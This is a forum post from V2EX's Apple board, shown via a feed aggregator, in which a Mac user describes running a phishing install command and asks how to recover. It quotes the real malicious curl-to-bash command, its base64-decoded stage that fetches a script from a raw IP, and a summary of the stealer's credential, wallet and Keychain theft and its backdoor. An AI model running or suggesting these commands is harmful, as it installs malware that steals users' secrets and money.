惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

量子位
WordPress大学
WordPress大学
小众软件
小众软件
云风的 BLOG
云风的 BLOG
IT之家
IT之家
人人都是产品经理
人人都是产品经理
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Last Week in AI
Last Week in AI
博客园 - 【当耐特】
T
Tailwind CSS Blog
阮一峰的网络日志
阮一峰的网络日志
V
V2EX
宝玉的分享
宝玉的分享
博客园 - Franky
F
Fortinet All Blogs
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
GbyAI
GbyAI
Hugging Face - Blog
Hugging Face - Blog
Jina AI
Jina AI
D
Docker
博客园 - 聂微东
C
Check Point Blog
H
Help Net Security

V2EX - Apple

ios 版本更新至 18.7.8 后部分 app 出现无法联网的情况 Codex App 替代全局语音输入 苹果中国官网挂了 Apple 苹果开发者现在被正式盯上了吗,报税通知邮件大家有没有收到? 中国账号开始强制 iCloud 云贵 😊Vibe 了一个给 iOS6 用的 AI 聊天客户端 App 审核 In Review 两周了 请问大佬们现在 iOS 的自签续签都用啥软件?能手机上完成续签操作的? 在京东上买了 iPhone air 14pro, 1t, 18.7.8,电池 81,感觉还能用 2 年 请教巨佬:现在 [4 月 23 日] 这个时间点值得买 iphone17 吗? 受够了 Mac OS 上 Finder 的搜索体验,写了个 macOS 文件搜索工具 ios18.7.8 能更新么 盖世游戏 macOS 太好用了,比 crossover 好多了 14 寸 M5PRO 的 mbp 是不是散热很差呀? 做了个 Menu 小工具,限制 Mac 充电上限,保护电池健康 掐指一算从去年 12 月开始 ai 编程我已经做了 8 个项目,未来希望再发个手机和游戏应用 苹果 macOS 27 将彻底放弃 Intel Mac watch 配对新手机究竟如何恢复最新备份? apple 以旧换新可以叠加 Epp 吗 Mac 如何阻止软件自动更新? 这种港区(HKD)Apple store 礼品卡能不能用于买 iPhone ? Apple 地图规划出了“不存在”的线路 想入 iPad Pro AirPods2 pro 充不上电求助 请问现在 Apple ID 土区注册问题 mac 连接有线音响,看视频总是前几秒没声音 iPhone 16 Pro 玩 LOLM 掉帧咋办? 最近入手的一些 Macbook 分享,购买建议(13 寸 2015 Pro, 13 寸 2020 Pro M1) AirPods2 电池电量不足,大家是否换过?是否有推荐的店铺?
下载 Mac 软件执行了一个钓鱼脚本怎么办?怎么避免自己的账户...
neetz · 2025-10-19 · via V2EX - Apple

趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件

刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"

感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲

看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本

看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令

  1. 窃取密码 🔑 它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。

  2. 窃取加密货币钱包 💰 (主要目标) 浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。

桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。

  1. 窃取各类浏览器数据 🌐 它会攻击市面上几乎所有的主流浏览器( Chrome, Safari, Firefox, Edge, Brave, Opera 等)。

窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。

  1. 窃取个人敏感文件 📄 钥匙串 (Keychain): 复制你整个系统钥匙串文件,里面可能包含你的 Wi-Fi 密码、应用密码等。

备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。

本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。

  1. 打包上传,发送给黑客 📤 它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。

然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。

  1. 植入后门并替换正常程序 🚪 持久化后门: 它会用你输入的密码,在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑,这个恶意软件也会自动运行,让黑客可以持续控制你的电脑。

程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。

这个是不是只能重装系统了?我还要做什么来保护自己的账户吗